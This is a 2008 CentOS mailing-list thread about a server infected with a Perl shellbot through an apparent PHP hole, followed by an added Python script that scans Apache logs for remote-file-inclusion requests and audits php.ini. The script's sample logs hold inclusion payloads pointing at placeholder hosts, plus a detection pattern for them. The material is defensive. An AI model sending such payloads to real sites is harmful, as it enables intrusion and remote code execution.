[CentOS] mystery process "unit"

Tue Aug 12 14:16:20 UTC 2008
Rainer Duffner <rainer at ultra-secure.de>

sbeam wrote:

> On Tuesday 12 August 2008 09:08, Mr Shunz wrote:
>> maybe you should check with "lsof -p 3041" and see which files/pipes it
>> uses to have a clue.
> of course! <slap>
> it's a perl w0rm that was uploaded last night, now killed. Now to determine 
> how it got in.
> I found some output in the main apache error log that looks like wget was used 
> to download a shellbot. But I can't figure out how wget was called, may be 
> some PHP exec() call that is unchecked. 

Anything in /tmp ?

Disable register_globals and allow_url_fopen.
Set open_basedir for any virtual hosts to the absolute minimum.

That will help a bit.

> But I can't find it on the system yet or the data files it uses.
> chkrootkit says all is clear.
> mod_security is now being installed, belatedly. This server has only been up 1 
> week, sheesh.
> thanks
> Sam

It was most likely executed via a remote server. Look for URLs in the 
logs that fetch stuff from remote servers.
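The two pieces of advice in this reply, checking php.ini for register_globals / allow_url_fopen / open_basedir and grepping the access log for requests whose parameters point at a remote URL, can both be automated. The script below is an added example written for this page, not code posted by anyone in the thread; the log lines and php.ini excerpts are constructed (documentation-range IPs, made-up paths and file names), and the functions `find_remote_fetches` and `audit_php_ini` are names chosen here.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format, fields up to the response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A query-string value that is itself a fetchable URL is the pattern behind
# allow_url_fopen abuse (include($_GET['page']) pulling code off a remote host).
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

# Constructed sample log: two suspicious requests, one benign (the benign
# one carries a URL only in the Referer field, which is not inspected).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2008:03:14:22 +0000] "GET /index.php?page=http://198.51.100.9/bot.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Aug/2008:03:14:25 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://www.example.com/" "Mozilla/4.0"
198.51.100.22 - - [12/Aug/2008:03:15:01 +0000] "GET /view.php?tpl=ftp%3A%2F%2F198.51.100.9%2Fs.txt HTTP/1.0" 200 1300 "-" "curl/7.18"
"""

# Constructed php.ini excerpts: the weak settings the reply warns about,
# and the hardened equivalents for one virtual host.
WEAK_INI = """\
; constructed excerpt, weak
register_globals = On
allow_url_fopen = On
"""

HARDENED_INI = """\
; constructed excerpt, hardened (path is a placeholder vhost root)
register_globals = Off
allow_url_fopen = Off
open_basedir = "/var/www/vhosts/example.com/htdocs:/var/www/vhosts/example.com/tmp"
"""


def parse_log_line(line):
    """Return the named fields of one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_remote_fetches(log_text):
    """List (client_ip, script_path, param_name, remote_url) for every request
    whose query string carries a remote URL. parse_qsl percent-decodes values,
    so encoded schemes such as ftp%3A%2F%2F are caught too."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_log_line(line)
        if not entry:
            continue
        path, query = urlsplit(entry['target']).path, urlsplit(entry['target']).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append((entry['ip'], path, name, value))
    return hits


def parse_ini(text):
    """Minimal php.ini reader: 'key = value' pairs, ';' comments stripped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()
        if not line or '=' not in line:
            continue
        key, _, value = line.partition('=')
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def audit_php_ini(text):
    """Return a list of findings for the three directives named in the reply.
    Defaults mirror PHP's own: register_globals Off, allow_url_fopen On."""
    s = parse_ini(text)
    findings = []

    def is_on(v):
        return v.lower() in ('1', 'on', 'true', 'yes')

    if is_on(s.get('register_globals', 'Off')):
        findings.append('register_globals is On; set register_globals = Off')
    if is_on(s.get('allow_url_fopen', 'On')):
        findings.append('allow_url_fopen is On; set allow_url_fopen = Off')
    if not s.get('open_basedir'):
        findings.append('open_basedir is unset; restrict each vhost to its document root')
    return findings


if __name__ == '__main__':
    for hit in find_remote_fetches(SAMPLE_LOG):
        print('remote fetch via query string:', hit)
    for ini_name, ini in (('weak', WEAK_INI), ('hardened', HARDENED_INI)):
        print(ini_name, 'php.ini findings:', audit_php_ini(ini) or 'none')
```

Run against a real access log, the first function narrows the search the reply suggests to the handful of requests where a parameter was a URL, which usually identifies the script (and the PHP include or exec call) that was abused; the second function gives a quick pass/fail on the php.ini changes before and after they are applied.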